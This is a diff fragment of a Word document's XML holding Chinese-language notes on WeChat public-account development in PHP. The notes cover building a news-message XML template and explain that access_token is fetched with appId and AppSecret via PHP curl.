+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;PicUrl&gt;&lt;![CDATA["</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'PicUrl'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>].</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"]]&gt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>&lt;/PicUrl&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;Url&gt;&lt;![CDATA["</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$value</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>[</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'Url'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>].</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"]]&gt;&lt;/Url&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>&lt;/item&gt;"</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$template</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>.=</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="317ECC"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>"&lt;/Articles&gt;&lt;/xml&gt; "</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">echo </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="55AA55"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$template</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:color w:val="585858"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6439" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>Access_Token:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>使用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>php</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>内置</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>curl</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>操作</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>appId</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>AppSecret</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>用于获取</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>access_token</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>。公众帐号对应着微信服务器上的一个账户，在开发模式下，不仅微信服务器可以对你的服务器发送消息和事件，你的服务器也可以反过来操纵微信服务器上你的账户，那么就需要一个账户密码，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>access_token</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>就相当于这个密码。</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>access_token</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>是有有效期的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>，有效期内全局有效</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
+                <w:color w:val="14191E"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>。</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Curl</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>简单使用：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45D5251D" wp14:editId="112CC82A">
+                  <wp:extent cx="3950970" cy="2269490"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="58" name="图片 58"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId63"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="3950970" cy="2269490"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+            <w:bookmarkStart w:id="2" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="2"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6440" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:autoSpaceDE w:val="0"/>
+              <w:autoSpaceDN w:val="0"/>
+              <w:adjustRightInd w:val="0"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+                <w:i/>
+                <w:iCs/>
+                <w:color w:val="295F94"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="20"/>
               </w:rPr>
             </w:pPr>
           </w:p>
